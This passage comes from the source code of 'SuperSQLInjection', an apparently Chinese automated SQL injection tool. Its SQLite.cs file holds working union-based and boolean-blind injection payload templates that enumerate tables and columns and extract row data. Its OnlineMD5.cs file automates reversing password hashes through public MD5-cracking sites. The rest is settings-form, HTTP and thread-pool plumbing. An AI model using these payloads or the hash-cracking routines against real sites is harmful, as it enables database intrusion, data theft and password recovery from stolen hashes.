this.label2.Location = new System.Drawing.Point(201, 22); 68 | 
this.label2.Name = "label2"; 69 | this.label2.Size = new System.Drawing.Size(47, 12); 70 | this.label2.TabIndex = 2; 71 | this.label2.Text = "匹配:0"; 72 | // 73 | // FindString 74 | // 75 | this.AutoScaleDimensions = new System.Drawing.SizeF(6F, 12F); 76 | this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font; 77 | this.ClientSize = new System.Drawing.Size(370, 61); 78 | this.Controls.Add(this.label2); 79 | this.Controls.Add(this.label1); 80 | this.Controls.Add(this.txt_key); 81 | this.Controls.Add(this.btn_find); 82 | this.MaximizeBox = false; 83 | this.MinimizeBox = false; 84 | this.Name = "FindString"; 85 | this.ShowIcon = false; 86 | this.StartPosition = System.Windows.Forms.FormStartPosition.CenterScreen; 87 | this.Text = "查找字符"; 88 | this.ResumeLayout(false); 89 | this.PerformLayout(); 90 | 91 | } 92 | 93 | #endregion 94 | 95 | private System.Windows.Forms.Button btn_find; 96 | private System.Windows.Forms.TextBox txt_key; 97 | private System.Windows.Forms.Label label1; 98 | private System.Windows.Forms.Label label2; 99 | } 100 | } -------------------------------------------------------------------------------- /SuperSQLInjection/tools/OnlineMD5.cs: -------------------------------------------------------------------------------- 1 | using model; 2 | using System; 3 | using System.Collections.Generic; 4 | using System.Net; 5 | using System.Text; 6 | using System.Text.RegularExpressions; 7 | 8 | namespace SuperSQLInjection.tools 9 | { 10 | class OnlineMD5 11 | { 12 | 13 | public static String decodeMD5_cmd5(String md5){ 14 | ServerInfo server_index=HTTPRequest.getHtml("http://www.cmd5.com/",null,null); 15 | String VIEWSTATE = Regex.Match(server_index.body, "VIEWSTATE\" value=\"(?\\S+)\"").Groups["result"].Value; 16 | 17 | String data = "__VIEWSTATE=" + VIEWSTATE + "&ctl00%24ContentPlaceHolder1%24TextBoxInput=" + md5 + "&ctl00%24ContentPlaceHolder1%24InputHashType=md5&ctl00%24ContentPlaceHolder1%24Button1=%E8%A7%A3%E5%AF%86"; 18 | ServerInfo server_result 
= HTTPRequest.getHtmlByPost("http://www.cmd5.com", data, "http://www.cmd5.com/", server_index.cookies); 19 | String result = Regex.Match(server_result.body, "Answer\">(?\\S+)\\S+)\"").Groups["result"].Value; 29 | String sand = Regex.Match(server_index.body, "sand\" value=\"(?\\S+)\"").Groups["result"].Value; 30 | if (token.Length > 1) { 31 | 32 | ServerInfo server_result = HTTPRequest.getHtmlByPost("http://www.md5.com.cn/md5reverse", "md=" + md5 + "&sand=" + sand + "&token=" + token + "&submit=MD5+Crack", "http://www.md5.com.cn/", server_index.cookies); 33 | String result = Regex.Match(server_result.body, "green\">(?\\S+)").Groups["result"].Value; 34 | return result; 35 | } 36 | return "接口异常"; 37 | 38 | } 39 | public static String decodeMD5_xmd5_org(String md5) 40 | { 41 | 42 | ServerInfo server_index = HTTPRequest.getHtml("http://www.xmd5.org", null, null); 43 | 44 | ServerInfo server_result = HTTPRequest.getHtml("http://www.xmd5.org/md5/search.asp?hash="+md5+"&xmd5=MD5+%BD%E2%C3%DC", "http://www.xmd5.org/", server_index.cookies); 45 | String result = Regex.Match(server_result.body, "ff\" size=\"3\">(?\\S+) ").Groups["result"].Value; 46 | return result; 47 | } 48 | 49 | public static String decodeMD5_somd5_com(String md5) 50 | { 51 | 52 | ServerInfo server_result = HTTPRequest.getHtmlByPost("http://www.somd5.com/somd5-index-md5.html", "isajax=sJUVsBd1XOzFDPynHEfSnSt&md5=" + md5, "http://www.somd5.com/", null); 53 | String result = Regex.Match(server_result.body, "inline;\">(?\\S+)").Groups["result"].Value; 54 | return result; 55 | } 56 | public static String decodeMD5_md5_cc(String md5) 57 | { 58 | 59 | ServerInfo server_result = HTTPRequest.getHtml("http://www.md5.cc/ShowMD5Info.asp?GetType=ShowInfo&md5_str="+md5, "http://www.md5.cc/", null); 60 | String result = Regex.Match(server_result.body, "px\">(?\\S+)").Groups["result"].Value; 61 | return result; 62 | } 63 | 64 | public static String decodeMD5_pmd5_com(String md5) 65 | { 66 | ServerInfo server_index = 
HTTPRequest.getHtml("http://pmd5.com/", null, null); 67 | String VIEWSTATE = Regex.Match(server_index.body, "VIEWSTATE\" value=\"(?\\S+)\"").Groups["result"].Value; 68 | String EVENTVALIDATION = Regex.Match(server_index.body, "EVENTVALIDATION\" value=\"(?\\S+)\"").Groups["result"].Value; 69 | 70 | String data = "__VIEWSTATE=" + VIEWSTATE + "&__EVENTVALIDATION=" + EVENTVALIDATION + "&key=" + md5 + "&jiemi=MD5%E8%A7%A3%E5%AF%86"; 71 | ServerInfo server_result = HTTPRequest.getHtmlByPost("http://pmd5.com/?action=getpwd", data, "http://pmd5.com/", server_index.cookies); 72 | String result = Regex.Match(server_result.body, "为“(?\\S+)").Groups["result"].Value; 73 | return result; 74 | 75 | } 76 | } 77 | } 78 | -------------------------------------------------------------------------------- /SuperSQLInjection/Seting.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.ComponentModel; 4 | using System.Data; 5 | using System.Drawing; 6 | using System.Text; 7 | using System.Windows.Forms; 8 | using tools; 9 | 10 | namespace SuperSQLInjection 11 | { 12 | public partial class Seting : Form 13 | { 14 | public Seting(Main main) 15 | { 16 | InitializeComponent(); 17 | this.main = main; 18 | } 19 | 20 | private Main main = null; 21 | 22 | private void chk_mysqlMuStr_CheckedChanged(object sender, EventArgs e) 23 | { 24 | main.config.isMuStr = this.chk_mysqlMuStr.Checked; 25 | } 26 | 27 | private void chk_openInfoLog_CheckedChanged(object sender, EventArgs e) 28 | { 29 | main.config.isOpenInfoLog = this.chk_openInfoLog.Checked; 30 | } 31 | 32 | private void chk_openHTTPLog_CheckedChanged(object sender, EventArgs e) 33 | { 34 | main.config.isOpenHTTPLog = this.chk_openHTTPLog.Checked; 35 | } 36 | 37 | private void chk_autoCheckUpdate_CheckedChanged(object sender, EventArgs e) 38 | { 39 | main.config.isAutoCheckUpdate = this.chk_autoCheckUpdate.Checked; 40 | } 41 | 42 | 43 | 44 | 
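/// <summary>
/// Stores the "save configuration on close" checkbox state in the shared config.
/// </summary>
private void chk_isAutoSaveConfig_CheckedChanged(object sender, EventArgs e)
{
    main.config.isSavaConfigWhenClose = this.chk_isAutoSaveConfig.Checked;
}

/// <summary>
/// Copies the current <c>main.config</c> values into the form's controls.
/// </summary>
private void Seting_Shown(object sender, EventArgs e)
{
    this.chk_openHTTPLog.Checked = main.config.isOpenHTTPLog;
    this.chk_openInfoLog.Checked = main.config.isOpenInfoLog;
    this.chk_mysqlMuStr.Checked = main.config.isMuStr;
    this.chk_autoCheckUpdate.Checked = main.config.isAutoCheckUpdate;
    this.chk_isAutoSaveConfig.Checked = main.config.isSavaConfigWhenClose;
    this.cmb_maxClolumnsCount.Text = main.config.maxClolumns.ToString();
    this.cmb_oneDomainMaxSpiderCount.Text = main.config.maxSpiderCount.ToString();
    this.cmb_oneDomainMaxScanCount.Text = main.config.maxScanCount.ToString();
    this.chk_redirectDoGet.Checked = main.config.redirectDoGet;
    this.cmb_unionFill.Text = main.config.unionFill;
    this.txt_proxy_host.Text = main.config.proxy_check_host;
    this.txt_proxy_port.Text = main.config.proxy_check_port.ToString();
    this.txt_proxy_keys.Text = main.config.proxy_check_Keys;
}

/// <summary>
/// Updates <c>maxClolumns</c> from the combo box text.
/// </summary>
/// <remarks>
/// The value is applied only when the text parses as an integer; empty or
/// non-numeric text leaves the previous setting in place instead of raising
/// a FormatException inside the event handler.
/// </remarks>
private void cob_maxClolumnsCount_SelectedValueChanged(object sender, EventArgs e)
{
    int parsed;
    if (int.TryParse(this.cmb_maxClolumnsCount.Text, out parsed))
    {
        main.config.maxClolumns = parsed;
    }
}

/// <summary>
/// Updates <c>maxSpiderCount</c> from the combo box text; unparsable text is ignored.
/// </summary>
private void cob_oneDomainMaxSpiderCount_SelectedValueChanged(object sender, EventArgs e)
{
    int parsed;
    if (int.TryParse(this.cmb_oneDomainMaxSpiderCount.Text, out parsed))
    {
        main.config.maxSpiderCount = parsed;
    }
}

/// <summary>
/// Updates <c>maxScanCount</c> from the combo box text; unparsable text is ignored.
/// </summary>
private void cob_oneDomainMaxScanCount_SelectedValueChanged(object sender, EventArgs e)
{
    int parsed;
    if (int.TryParse(this.cmb_oneDomainMaxScanCount.Text, out parsed))
    {
        main.config.maxScanCount = parsed;
    }
}

/// <summary>
/// Stores the redirect-handling checkbox state in the shared config.
/// </summary>
private void chk_redirectDoGet_CheckedChanged(object sender, EventArgs e)
{
    main.config.redirectDoGet = this.chk_redirectDoGet.Checked;
}

private void cmb_unionFill_SelectedValueChanged(object sender, EventArgs e)
{
    main.config.unionFill = 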
this.cmb_unionFill.Text; 89 | } 90 | 91 | private void txt_proxy_host_TextChanged(object sender, EventArgs e) 92 | { 93 | main.config.proxy_check_host = this.txt_proxy_host.Text; 94 | } 95 | 96 | private void txt_proxy_port_TextChanged(object sender, EventArgs e) 97 | { 98 | main.config.proxy_check_port = Tools.convertToInt(this.txt_proxy_port.Text); 99 | } 100 | 101 | private void txt_proxy_keys_TextChanged(object sender, EventArgs e) 102 | { 103 | main.config.proxy_check_Keys = this.txt_proxy_keys.Text; 104 | } 105 | } 106 | } 107 | -------------------------------------------------------------------------------- /SuperSQLInjection/tools/smartthread/Exceptions.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | #if !(_WINDOWS_CE) 3 | using System.Runtime.Serialization; 4 | #endif 5 | 6 | namespace Amib.Threading 7 | { 8 | #region Exceptions 9 | 10 | /// 11 | /// Represents an exception in case IWorkItemResult.GetResult has been canceled 12 | /// 13 | public sealed partial class WorkItemCancelException : Exception 14 | { 15 | public WorkItemCancelException() 16 | { 17 | } 18 | 19 | public WorkItemCancelException(string message) 20 | : base(message) 21 | { 22 | } 23 | 24 | public WorkItemCancelException(string message, Exception e) 25 | : base(message, e) 26 | { 27 | } 28 | } 29 | 30 | /// 31 | /// Represents an exception in case IWorkItemResult.GetResult has been timed out 32 | /// 33 | public sealed partial class WorkItemTimeoutException : Exception 34 | { 35 | public WorkItemTimeoutException() 36 | { 37 | } 38 | 39 | public WorkItemTimeoutException(string message) 40 | : base(message) 41 | { 42 | } 43 | 44 | public WorkItemTimeoutException(string message, Exception e) 45 | : base(message, e) 46 | { 47 | } 48 | } 49 | 50 | /// 51 | /// Represents an exception in case IWorkItemResult.GetResult has been timed out 52 | /// 53 | public sealed partial class WorkItemResultException : Exception 54 | { 55 | public 
WorkItemResultException() 56 | { 57 | } 58 | 59 | public WorkItemResultException(string message) 60 | : base(message) 61 | { 62 | } 63 | 64 | public WorkItemResultException(string message, Exception e) 65 | : base(message, e) 66 | { 67 | } 68 | } 69 | 70 | 71 | /// 72 | /// Represents an exception in case the STP queue is full and work item cannot be queued. 73 | /// Relevant when the STP has a queue size limit 74 | /// 75 | public sealed partial class QueueRejectedException : Exception 76 | { 77 | public QueueRejectedException() 78 | { 79 | } 80 | 81 | public QueueRejectedException(string message) 82 | : base(message) 83 | { 84 | } 85 | 86 | public QueueRejectedException(string message, Exception e) 87 | : base(message, e) 88 | { 89 | } 90 | } 91 | 92 | #if !(_WINDOWS_CE) && !(_SILVERLIGHT) && !(WINDOWS_PHONE) 93 | /// 94 | /// Represents an exception in case IWorkItemResult.GetResult has been canceled 95 | /// 96 | [Serializable] 97 | public sealed partial class WorkItemCancelException 98 | { 99 | public WorkItemCancelException(SerializationInfo si, StreamingContext sc) 100 | : base(si, sc) 101 | { 102 | } 103 | } 104 | 105 | /// 106 | /// Represents an exception in case IWorkItemResult.GetResult has been timed out 107 | /// 108 | [Serializable] 109 | public sealed partial class WorkItemTimeoutException 110 | { 111 | public WorkItemTimeoutException(SerializationInfo si, StreamingContext sc) 112 | : base(si, sc) 113 | { 114 | } 115 | } 116 | 117 | /// 118 | /// Represents an exception in case IWorkItemResult.GetResult has been timed out 119 | /// 120 | [Serializable] 121 | public sealed partial class WorkItemResultException 122 | { 123 | public WorkItemResultException(SerializationInfo si, StreamingContext sc) 124 | : base(si, sc) 125 | { 126 | } 127 | } 128 | 129 | /// 130 | /// Represents an exception in case IWorkItemResult.GetResult has been timed out 131 | /// 132 | [Serializable] 133 | public sealed partial class QueueRejectedException 134 | { 135 | public 
QueueRejectedException(SerializationInfo si, StreamingContext sc) 136 | : base(si, sc) 137 | { 138 | } 139 | } 140 | 141 | #endif 142 | 143 | #endregion 144 | } 145 | -------------------------------------------------------------------------------- /SuperSQLInjection/tools/smartthread/WorkItemResultTWrapper.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Threading; 3 | 4 | namespace Amib.Threading.Internal 5 | { 6 | #region WorkItemResultTWrapper class 7 | 8 | internal class WorkItemResultTWrapper : IWorkItemResult, IInternalWaitableResult 9 | { 10 | private readonly IWorkItemResult _workItemResult; 11 | 12 | public WorkItemResultTWrapper(IWorkItemResult workItemResult) 13 | { 14 | _workItemResult = workItemResult; 15 | } 16 | 17 | #region IWorkItemResult Members 18 | 19 | public TResult GetResult() 20 | { 21 | return (TResult)_workItemResult.GetResult(); 22 | } 23 | 24 | public TResult GetResult(int millisecondsTimeout, bool exitContext) 25 | { 26 | return (TResult)_workItemResult.GetResult(millisecondsTimeout, exitContext); 27 | } 28 | 29 | public TResult GetResult(TimeSpan timeout, bool exitContext) 30 | { 31 | return (TResult)_workItemResult.GetResult(timeout, exitContext); 32 | } 33 | 34 | public TResult GetResult(int millisecondsTimeout, bool exitContext, WaitHandle cancelWaitHandle) 35 | { 36 | return (TResult)_workItemResult.GetResult(millisecondsTimeout, exitContext, cancelWaitHandle); 37 | } 38 | 39 | public TResult GetResult(TimeSpan timeout, bool exitContext, WaitHandle cancelWaitHandle) 40 | { 41 | return (TResult)_workItemResult.GetResult(timeout, exitContext, cancelWaitHandle); 42 | } 43 | 44 | public TResult GetResult(out Exception e) 45 | { 46 | return (TResult)_workItemResult.GetResult(out e); 47 | } 48 | 49 | public TResult GetResult(int millisecondsTimeout, bool exitContext, out Exception e) 50 | { 51 | return (TResult)_workItemResult.GetResult(millisecondsTimeout, 
exitContext, out e); 52 | } 53 | 54 | public TResult GetResult(TimeSpan timeout, bool exitContext, out Exception e) 55 | { 56 | return (TResult)_workItemResult.GetResult(timeout, exitContext, out e); 57 | } 58 | 59 | public TResult GetResult(int millisecondsTimeout, bool exitContext, WaitHandle cancelWaitHandle, out Exception e) 60 | { 61 | return (TResult)_workItemResult.GetResult(millisecondsTimeout, exitContext, cancelWaitHandle, out e); 62 | } 63 | 64 | public TResult GetResult(TimeSpan timeout, bool exitContext, WaitHandle cancelWaitHandle, out Exception e) 65 | { 66 | return (TResult)_workItemResult.GetResult(timeout, exitContext, cancelWaitHandle, out e); 67 | } 68 | 69 | public bool IsCompleted 70 | { 71 | get { return _workItemResult.IsCompleted; } 72 | } 73 | 74 | public bool IsCanceled 75 | { 76 | get { return _workItemResult.IsCanceled; } 77 | } 78 | 79 | public object State 80 | { 81 | get { return _workItemResult.State; } 82 | } 83 | 84 | public bool Cancel() 85 | { 86 | return _workItemResult.Cancel(); 87 | } 88 | 89 | public bool Cancel(bool abortExecution) 90 | { 91 | return _workItemResult.Cancel(abortExecution); 92 | } 93 | 94 | public WorkItemPriority WorkItemPriority 95 | { 96 | get { return _workItemResult.WorkItemPriority; } 97 | } 98 | 99 | public TResult Result 100 | { 101 | get { return (TResult)_workItemResult.Result; } 102 | } 103 | 104 | public object Exception 105 | { 106 | get { return _workItemResult.Exception; } 107 | } 108 | 109 | #region IInternalWorkItemResult Members 110 | 111 | public IWorkItemResult GetWorkItemResult() 112 | { 113 | return _workItemResult.GetWorkItemResult(); 114 | } 115 | 116 | public IWorkItemResult GetWorkItemResultT() 117 | { 118 | return (IWorkItemResult)this; 119 | } 120 | 121 | #endregion 122 | 123 | #endregion 124 | } 125 | 126 | #endregion 127 | 128 | } 129 | -------------------------------------------------------------------------------- /SuperSQLInjection/tools/smartthread/CallerThreadContext.cs: 

#if !(_WINDOWS_CE) && !(_SILVERLIGHT) && !(WINDOWS_PHONE)

using System;
using System.Diagnostics;
using System.Threading;
using System.Reflection;
using System.Web;
using System.Runtime.Remoting.Messaging;


namespace Amib.Threading.Internal
{
#region CallerThreadContext class

    /// <summary>
    /// Snapshot of the caller's logical call context and HttpContext, taken so that
    /// both can be re-installed on the thread that later executes the work item.
    /// </summary>
    /// <remarks>
    /// The logical call context is cloned on capture, while the HttpContext is kept
    /// by reference. <see cref="Apply"/> overwrites the target thread's values and
    /// does not save or restore what was there before; nothing in this class resets
    /// the thread afterwards, so any clean-up has to happen in the caller.
    /// </remarks>
    internal class CallerThreadContext
    {
#region Prepare reflection information

        // Non-public Thread accessors, looked up once. Either may be null if the
        // runtime does not expose the method; both call sites check for that.
        private static readonly MethodInfo getLogicalCallContextMethodInfo =
            typeof(Thread).GetMethod("GetLogicalCallContext", BindingFlags.Instance | BindingFlags.NonPublic);

        private static readonly MethodInfo setLogicalCallContextMethodInfo =
            typeof(Thread).GetMethod("SetLogicalCallContext", BindingFlags.Instance | BindingFlags.NonPublic);

        // Only referenced from the commented-out CallContext.SetData line in Apply.
        private static string HttpContextSlotName = GetHttpContextSlotName();

        /// <summary>
        /// Reads the non-public static HttpContext.CallContextSlotName field,
        /// falling back to the literal "HttpContext" when the field is not found.
        /// </summary>
        private static string GetHttpContextSlotName()
        {
            FieldInfo slotField = typeof(HttpContext).GetField("CallContextSlotName", BindingFlags.Static | BindingFlags.NonPublic);

            return slotField != null
                ? (string)slotField.GetValue(null)
                : "HttpContext";
        }

#endregion

#region Private fields

        private HttpContext _httpContext;
        private LogicalCallContext _callContext;

#endregion

        /// <summary>
        /// Instances are created only through <see cref="Capture"/>.
        /// </summary>
        private CallerThreadContext()
        {
        }

        /// <summary>True when a logical call context was captured.</summary>
        public bool CapturedCallContext
        {
            get { return _callContext != null; }
        }

        /// <summary>True when an HttpContext was captured.</summary>
        public bool CapturedHttpContext
        {
            get { return _httpContext != null; }
        }

        /// <summary>
        /// Captures the requested parts of the current thread's context.
        /// </summary>
        /// <param name="captureCallContext">Capture a clone of the logical call context.</param>
        /// <param name="captureHttpContext">Capture a reference to HttpContext.Current.</param>
        /// <returns>A new snapshot; a part stays null when it was not requested or not available.</returns>
        public static CallerThreadContext Capture(
            bool captureCallContext,
            bool captureHttpContext)
        {
            Debug.Assert(captureCallContext || captureHttpContext);

            CallerThreadContext snapshot = new CallerThreadContext();

            // TODO: In NET 2.0, redo using the new feature of ExecutionContext class - Capture()
            if (captureCallContext && getLogicalCallContextMethodInfo != null)
            {
                LogicalCallContext current =
                    (LogicalCallContext)getLogicalCallContextMethodInfo.Invoke(Thread.CurrentThread, null);

                // Clone so later changes on the caller's thread do not leak into the snapshot.
                snapshot._callContext = (current == null)
                    ? null
                    : (LogicalCallContext)current.Clone();
            }

            // The HttpContext is stored by reference, not copied.
            if (captureHttpContext && HttpContext.Current != null)
            {
                snapshot._httpContext = HttpContext.Current;
            }

            return snapshot;
        }

        /// <summary>
        /// Installs a previously captured context on the current thread.
        /// </summary>
        /// <param name="callerThreadContext">Snapshot returned by <see cref="Capture"/>.</param>
        /// <exception cref="ArgumentNullException"><paramref name="callerThreadContext"/> is null.</exception>
        public static void Apply(CallerThreadContext callerThreadContext)
        {
            if (callerThreadContext == null)
            {
                throw new ArgumentNullException("callerThreadContext");
            }

            // Todo: In NET 2.0, redo using the new feature of ExecutionContext class - Run()
            LogicalCallContext capturedCallContext = callerThreadContext._callContext;
            if (capturedCallContext != null && setLogicalCallContextMethodInfo != null)
            {
                object[] invokeArgs = new object[] { capturedCallContext };
                setLogicalCallContextMethodInfo.Invoke(Thread.CurrentThread, invokeArgs);
            }

            HttpContext capturedHttpContext = callerThreadContext._httpContext;
            if (capturedHttpContext != null)
            {
                HttpContext.Current = capturedHttpContext;
                //CallContext.SetData(HttpContextSlotName, callerThreadContext._httpContext);
            }
        }
    }

#endregion
}
#endif
-------------------------------------------------------------------------------- /SuperSQLInjection/payload/SQLite.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Text; 4 | using tools; 5 | 6 | namespace SuperSQLInjection.payload 7 | { 8 | class SQLite 9 | { 10 | //加载对应配置(需要读取的环境变量) 11 | public static String path = "config/vers/sqlite.txt"; 12 | public static List vers = FileTool.readFileToList(path); 13 | 14 | //表数量 15 | public static String tables_count = "(select count(1) from sqlite_master where type=char(116)||char(97)||char(98)||char(108)||char(101))"; 16 | 17 | //获取表名称 18 | public static String table_value = "(select tbl_name from sqlite_master where type=char(116)||char(97)||char(98)||char(108)||char(101) limit 1 offset {index})"; 19 | 20 | //获取列名称 21 | public static String column_value = "(select substr(sql,instr(sql,char(40))) from sqlite_master where type=char(116)||char(97)||char(98)||char(108)||char(101) and tbl_name='{table}')"; 22 | 23 | //获取表数量bool 24 | public static String bool_tables_count = " " + tables_count + ">{len}"; 25 | 26 | 27 | //bool方式字符长度判断 28 | public static String bool_length = " length({data})>{len}"; 29 | 30 | public static String check_li_value = " length({data})<{len}"; 31 | 32 | 33 | //bool方式获取值 34 | public static String bool_value = " unicode(substr({data},{index},1))>{len}"; 35 | 36 | //bool方式获取值 37 | public static String bool_noUnicode_value = "{data}>{len}"; 38 | 39 | public static String unicode_value = " unicode(substr({data},{index},1))"; 40 | 41 | //获取行数据 42 | public static String data_value = "(select {data} from {table} limit 1 offset {index})"; 43 | 44 | //union获取数据条数 45 | public static String data_count = "(select count(1) from {table})"; 46 | 47 | public static String bool_datas_count = " " + data_count + ">={len}"; 48 | 49 | //union获取值 50 | public static String union_value = " 1=2 union all select {data}"; 
51 | 52 | public static String getUnionDataValue(int columnsLen, int showIndex, String Fill, List columns, String table, String index) 53 | { 54 | StringBuilder sb = new StringBuilder(); 55 | String data = "char(94)||char(94)||char(33)||" + unionColumns(columns, "||char(36)||char(9)||char(36)||") + "||char(33)||char(94)||char(94)"; 56 | for (int i = 1; i <= columnsLen; i++) 57 | { 58 | if (i == showIndex) 59 | { 60 | sb.Append(data_value.Replace("{data}", data).Replace("{allcolumns}", unionColumns(columns, ",")).Replace("{table}", table).Replace("{index}", index)); 61 | sb.Append(","); 62 | } 63 | else 64 | { 65 | sb.Append(Fill + ","); 66 | } 67 | } 68 | sb.Remove(sb.Length - 1, 1); 69 | return union_value.Replace("{data}", sb.ToString()); 70 | } 71 | 72 | public static String unionColumns(List columns, String unionStr) 73 | { 74 | StringBuilder sb = new StringBuilder(); 75 | foreach (String column in columns) 76 | { 77 | 78 | sb.Append("coalesce("+column+",char(32))"+unionStr); 79 | } 80 | sb.Remove(sb.Length - unionStr.Length, unionStr.Length); 81 | return sb.ToString(); 82 | } 83 | 84 | public static String getUnionDataValue(int columnsLen, int showIndex, String Fill, String dataPayLoad) 85 | { 86 | StringBuilder sb = new StringBuilder(); 87 | for (int i = 1; i <= columnsLen; i++) 88 | { 89 | if (i == showIndex) 90 | { 91 | sb.Append("(char(94)||char(94)||char(33)||" + dataPayLoad + "||char(33)||char(94)||char(94)),"); 92 | } 93 | else 94 | { 95 | sb.Append(Fill + ","); 96 | } 97 | } 98 | sb.Remove(sb.Length - 1, 1); 99 | return union_value.Replace("{data}", sb.ToString()); 100 | } 101 | public static String getBoolDataPayLoad(String column, List columns, String dbName, String table, int index) 102 | { 103 | String data = data_value.Replace("{data}", column).Replace("{allcolumns}", unionColumns(columns, ",")).Replace("{orderby}", columns[0]); 104 | String payload = data.Replace("{dbname}", dbName).Replace("{table}", table).Replace("{data}", 
column).Replace("{index}", index.ToString()); 105 | return payload; 106 | } 107 | 108 | } 109 | } 110 | -------------------------------------------------------------------------------- /SuperSQLInjection/tools/http/HTTPRequest.cs: -------------------------------------------------------------------------------- 1 | using model; 2 | using System; 3 | using System.Collections.Generic; 4 | using System.IO; 5 | using System.Net; 6 | using System.Text; 7 | using System.Text.RegularExpressions; 8 | using tools; 9 | 10 | namespace SuperSQLInjection.tools 11 | { 12 | class HTTPRequest 13 | { 14 | public static ServerInfo getHtmlByPost(String url, String data,String referer,String cookies) 15 | { 16 | ServerInfo server = new ServerInfo(); 17 | HttpWebResponse response = null; 18 | StreamReader sr = null; 19 | HttpWebRequest request = null; 20 | 21 | try 22 | { 23 | //设置模拟http访问参数 24 | Uri uri = new Uri(url); 25 | request = (HttpWebRequest)WebRequest.Create(uri); 26 | request.Method = "POST"; 27 | request.UserAgent = "Mozilla/5.0"; 28 | request.ContentType = "application/x-www-form-urlencoded"; 29 | request.Timeout = 30000; 30 | request.KeepAlive = true; 31 | if (referer != null) { 32 | request.Referer = referer; 33 | } 34 | request.AllowAutoRedirect = false; 35 | if (!"".Equals(cookies)) 36 | { 37 | request.Headers.Add("Cookie", cookies); 38 | } 39 | byte[] bydata = Encoding.ASCII.GetBytes(data); 40 | request.ContentLength = bydata.Length; 41 | Stream reqStream = request.GetRequestStream(); 42 | reqStream.Write(bydata, 0, bydata.Length); 43 | reqStream.Close(); 44 | response = (HttpWebResponse)request.GetResponse(); 45 | CookieCollection cc = response.Cookies; 46 | StreamReader str = new StreamReader(response.GetResponseStream()); 47 | server.body= str.ReadToEnd(); 48 | server.cookies = response.Headers["Set-Cookie"]; 49 | } 50 | catch (Exception e) 51 | { 52 | Tools.SysLog(e.Message); 53 | } 54 | finally 55 | { 56 | if (sr != null) 57 | { 58 | sr.Close(); 59 | } 60 | if 
(response != null) 61 | { 62 | response.Close(); 63 | } 64 | if (request != null) 65 | { 66 | request.Abort(); 67 | } 68 | } 69 | return server; 70 | } 71 | public static String getHTMLEncoding(String header) 72 | { 73 | 74 | Match m = Regex.Match(header, "charset=\\S{0,8}\""); 75 | if (m.Success) 76 | { 77 | return m.Groups[0].Value.Replace("charset=", "").Replace("\"", ""); 78 | } 79 | return ""; 80 | } 81 | public static ServerInfo getHtml(String url,String referer,String cookies) 82 | { 83 | ServerInfo server = new ServerInfo(); 84 | HttpWebResponse response = null; 85 | StreamReader sr = null; 86 | HttpWebRequest request = null; 87 | try 88 | { 89 | 90 | //设置模拟http访问参数 91 | Uri uri = new Uri(url); 92 | request = (HttpWebRequest)WebRequest.Create(uri); 93 | request.Accept = "*/*"; 94 | request.Method = "GET"; 95 | request.Timeout = 30000; 96 | request.AllowAutoRedirect = false; 97 | if (referer != null) 98 | { 99 | request.Referer = referer; 100 | } 101 | if (!"".Equals(cookies)) 102 | { 103 | request.Headers.Add("Cookie", cookies); 104 | } 105 | response = (HttpWebResponse)request.GetResponse(); 106 | sr = new StreamReader(response.GetResponseStream(), Encoding.UTF8); 107 | 108 | //读取服务器端返回的消息 109 | server.body = sr.ReadToEnd(); 110 | server.cookies = response.Headers["Set-Cookie"]; 111 | 112 | } 113 | catch (Exception e) 114 | { 115 | Tools.SysLog(e.Message); 116 | } 117 | finally 118 | { 119 | if (sr != null) 120 | { 121 | sr.Close(); 122 | } 123 | if (response != null) 124 | { 125 | response.Close(); 126 | } 127 | if (request != null) 128 | { 129 | request.Abort(); 130 | } 131 | } 132 | return server; 133 | } 134 | } 135 | } 136 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | ## Ignore Visual Studio temporary files, build results, and 2 | ## files generated by popular Visual Studio add-ons. 
3 | 4 | # User-specific files 5 | *.suo 6 | *.user 7 | *.userosscache 8 | *.sln.docstates 9 | 10 | # User-specific files (MonoDevelop/Xamarin Studio) 11 | *.userprefs 12 | 13 | # Build results 14 | [Dd]ebug/ 15 | [Dd]ebugPublic/ 16 | [Rr]elease/ 17 | [Rr]eleases/ 18 | [Xx]64/ 19 | [Xx]86/ 20 | [Bb]uild/ 21 | bld/ 22 | [Bb]in/ 23 | [Oo]bj/ 24 | 25 | # Visual Studio 2015 cache/options directory 26 | .vs/ 27 | # Uncomment if you have tasks that create the project's static files in wwwroot 28 | #wwwroot/ 29 | 30 | # MSTest test Results 31 | [Tt]est[Rr]esult*/ 32 | [Bb]uild[Ll]og.* 33 | 34 | # NUNIT 35 | *.VisualState.xml 36 | TestResult.xml 37 | 38 | # Build Results of an ATL Project 39 | [Dd]ebugPS/ 40 | [Rr]eleasePS/ 41 | dlldata.c 42 | 43 | # DNX 44 | project.lock.json 45 | artifacts/ 46 | 47 | *_i.c 48 | *_p.c 49 | *_i.h 50 | *.ilk 51 | *.meta 52 | *.obj 53 | *.pch 54 | *.pdb 55 | *.pgc 56 | *.pgd 57 | *.rsp 58 | *.sbr 59 | *.tlb 60 | *.tli 61 | *.tlh 62 | *.tmp 63 | *.tmp_proj 64 | *.log 65 | *.vspscc 66 | *.vssscc 67 | .builds 68 | *.pidb 69 | *.svclog 70 | *.scc 71 | 72 | # Chutzpah Test files 73 | _Chutzpah* 74 | 75 | # Visual C++ cache files 76 | ipch/ 77 | *.aps 78 | *.ncb 79 | *.opendb 80 | *.opensdf 81 | *.sdf 82 | *.cachefile 83 | *.VC.db 84 | 85 | # Visual Studio profiler 86 | *.psess 87 | *.vsp 88 | *.vspx 89 | *.sap 90 | 91 | # TFS 2012 Local Workspace 92 | $tf/ 93 | 94 | # Guidance Automation Toolkit 95 | *.gpState 96 | 97 | # ReSharper is a .NET coding add-in 98 | _ReSharper*/ 99 | *.[Rr]e[Ss]harper 100 | *.DotSettings.user 101 | 102 | # JustCode is a .NET coding add-in 103 | .JustCode 104 | 105 | # TeamCity is a build add-in 106 | _TeamCity* 107 | 108 | # DotCover is a Code Coverage Tool 109 | *.dotCover 110 | 111 | # NCrunch 112 | _NCrunch_* 113 | .*crunch*.local.xml 114 | nCrunchTemp_* 115 | 116 | # MightyMoose 117 | *.mm.* 118 | AutoTest.Net/ 119 | 120 | # Web workbench (sass) 121 | .sass-cache/ 122 | 123 | # Installshield output folder 124 | 
